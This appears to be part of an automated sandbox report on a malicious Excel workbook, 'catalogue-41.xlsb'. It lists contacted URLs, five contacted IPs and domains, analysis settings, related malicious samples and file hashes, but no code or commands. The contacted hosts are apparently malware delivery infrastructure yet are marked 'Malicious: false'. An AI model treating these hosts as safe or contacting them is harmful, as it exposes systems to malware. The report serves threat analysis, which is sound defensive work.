                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                      high
                                                                                      https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                        high
                                                                                        http://weather.service.msn.com/data.aspxC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                          high
                                                                                          https://apis.live.net/v5.0/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                            high
                                                                                            https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                              high
                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                high
                                                                                                https://management.azure.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                  high
                                                                                                  https://wus2.contentsync.C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://incidents.diagnostics.office.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                    high
                                                                                                    https://clients.config.office.net/user/v1.0/iosC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                      high
                                                                                                      https://insertmedia.bing.office.net/odc/insertmediaC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                        high
                                                                                                        https://o365auditrealtimeingestion.manage.office.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office365.com/api/v1.0/me/ActivitiesC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                            high
                                                                                                            https://api.office.netC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                              high
                                                                                                              https://incidents.diagnosticssdf.office.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://clients.config.office.net/user/v1.0/android/policiesC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                  high
                                                                                                                  https://entitlement.diagnostics.office.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                    high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                      high
                                                                                                                      https://outlook.office.com/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                        high
                                                                                                                        https://storage.live.com/clientlogs/uploadlocationC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                          high
                                                                                                                          https://templatelogging.office.com/client/logC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office365.com/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                              high
                                                                                                                              https://webshell.suite.office.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://management.azure.com/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://login.windows.net/common/oauth2/authorizeC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://graph.windows.net/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://api.powerbi.com/beta/myorg/importsC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://devnull.onenote.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ncus.pagecontentsync.C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://messaging.office.com/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://augloop.office.com/v2C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://skyapi.live.net/Activity/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://clients.config.office.net/user/v1.0/macC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://dataservice.o365filtering.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://api.cortana.aiC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://onedrive.live.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://ovisualuiapp.azurewebsites.net/pbiagave/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://visio.uservoice.com/forums/368202-visio-on-devicesC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://directory.services.C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://login.windows-ppe.net/common/oauth2/authorizeC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://staging.cortana.aiC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown

                                                                                                                                                              Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              50.116.95.68
                                                                                                                                                              springbedspetroleum.comUnited States
                                                                                                                                                              26337OIS1USfalse
                                                                                                                                                              5.100.155.169
                                                                                                                                                              ponchokhana.comUnited Kingdom
                                                                                                                                                              394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                                              108.167.180.111
                                                                                                                                                              ethereality.infoUnited States
                                                                                                                                                              46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                              5.100.152.162
                                                                                                                                                              thefamouscurrybazaar.co.ukUnited Kingdom
                                                                                                                                                              394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                                              43.229.135.209
                                                                                                                                                              devrongolf.comThailand
                                                                                                                                                              56309SIAMDATA-TH408Fl4CATTOWERTHfalse

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                              Analysis ID:382840
                                                                                                                                                              Start date:06.04.2021
                                                                                                                                                              Start time:18:42:13
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 6m 27s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:light
                                                                                                                                                              Sample file name:catalogue-41.xlsb
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                              Number of analysed new started processes analysed:29
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.expl.evad.winXLSB@11/11@5/5
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HDC Information:Failed
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xlsb
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
                                                                                                                                                              Show All
                                                                                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                              • TCP Packets have been reduced to 100
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.255.188.83, 104.43.139.144, 40.88.32.150, 52.109.76.68, 52.109.12.22, 52.109.88.39, 52.109.12.23, 52.109.8.25, 20.82.210.154, 23.57.80.111, 168.61.161.212, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 20.54.26.129, 20.82.209.183
                                                                                                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              18:43:32API Interceptor1x Sleep call for process: rundll32.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              5.100.155.169http://y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074Get hashmaliciousBrowse
                                                                                                                                                              • y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074
                                                                                                                                                              5.100.152.162documents-602438418.xlsmGet hashmaliciousBrowse
                                                                                                                                                                documents-602438418.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  documents-575751901.xlsmGet hashmaliciousBrowse
                                                                                                                                                                    documents-1987093434.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      documents-760030714.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        documents-95598302.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          documents-262276649.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            data.xlsGet hashmaliciousBrowse
                                                                                                                                                                              full (24).xlsGet hashmaliciousBrowse
                                                                                                                                                                                data.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  data (43).xlsGet hashmaliciousBrowse

                                                                                                                                                                                    Domains

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    ponchokhana.comdocument-1048628209.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1771131239.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1370071295.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-69564892.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1320073816.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-184653858.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1729033050.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1268722929.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-540475316.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1456634656.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-12162673.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-997754822.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1376447212.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1813856412.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1776123548.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1201008736.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-684762271.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1590815978.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-800254041.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-469719570.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169

                                                                                                                                                                                    ASN

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    OIS1USdocument-4077682.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-1643341247.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-1977942244.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-972550903.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-972550903.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-852263110.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-2130763274.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    Purchase_Order 3109.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.85.227
                                                                                                                                                                                    document-669854873.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-1432391719.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-1811269384.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-586537513.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-1080811384.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-1680135502.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-1258602967.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-2092739367.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-1113405161.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-423354438.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-1514757151.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    document-1991729810.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.241.203.140
                                                                                                                                                                                    PUBLIC-DOMAIN-REGISTRYUSdocuments-1660683173.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 111.118.215.222
                                                                                                                                                                                    swift Copy.xls.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 208.91.199.225
                                                                                                                                                                                    document-1848152474.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 199.79.62.99
                                                                                                                                                                                    FN vw Safety 1 & 2.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 208.91.199.223
                                                                                                                                                                                    MV TBN.uslfze.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 208.91.199.224
                                                                                                                                                                                    purchase order.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 208.91.199.223
                                                                                                                                                                                    AD1-2001028L.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 208.91.199.224
                                                                                                                                                                                    AD1-2001028L (2).exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 208.91.199.224
                                                                                                                                                                                    document-1048628209.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1771131239.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1370071295.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-69564892.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1320073816.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-184653858.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1729033050.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1268722929.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-540475316.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-1456634656.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-12162673.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    document-997754822.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.100.155.169

                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19ddff.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    Doc_58YJ54-521DERG701-55YH701.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    1e#U0414.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    svhost.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    beaconxx.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    _VmailMessage_Wave19922626.htmlGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    5H957qLghX.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    FK58.vbsGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    ZgaBWrz3HH.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    RFQ#8086A_461A_0000086_300_3550_2021.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    wzdu53.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    Opik_lk.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    document-895003104.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    Dimmock5.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    pQlSDfwyYkf.jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    Balance payment..exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    pQlSDfwyYkf.jsGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    document-1641473761.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    ObJRDAd8jZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209
                                                                                                                                                                                    SecuriteInfo.com.Trojan.Encoder.33750.22954.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 50.116.95.68
                                                                                                                                                                                    • 108.167.180.111
                                                                                                                                                                                    • 5.100.155.169
                                                                                                                                                                                    • 5.100.152.162
                                                                                                                                                                                    • 43.229.135.209

                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                    No context

                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\C620B1EB-48B4-4D81-8EB0-1C63D8D3D019
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):133170
                                                                                                                                                                                    Entropy (8bit):5.371007262936854
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:rcQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:XVQ9DQW+zTXiJ
                                                                                                                                                                                    MD5:8D93A49EB655346E24D58F491356F823
                                                                                                                                                                                    SHA1:25D9D0FCEB02C78AECA2380033F77170A57ACBDE
                                                                                                                                                                                    SHA-256:3D000B24C3D3333CAB4DAC865C3BE094EEB58943CDD7B0139BF76C5482AB4C06
                                                                                                                                                                                    SHA-512:52936892A6AAB07B1D5AEF6EF5CC8A43EA694391255E688A474AB077B90CB9025A3730CD374838F6126FB7D8CF6D7C7EB48ACA1678782E8C711C8F007CDF4676
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
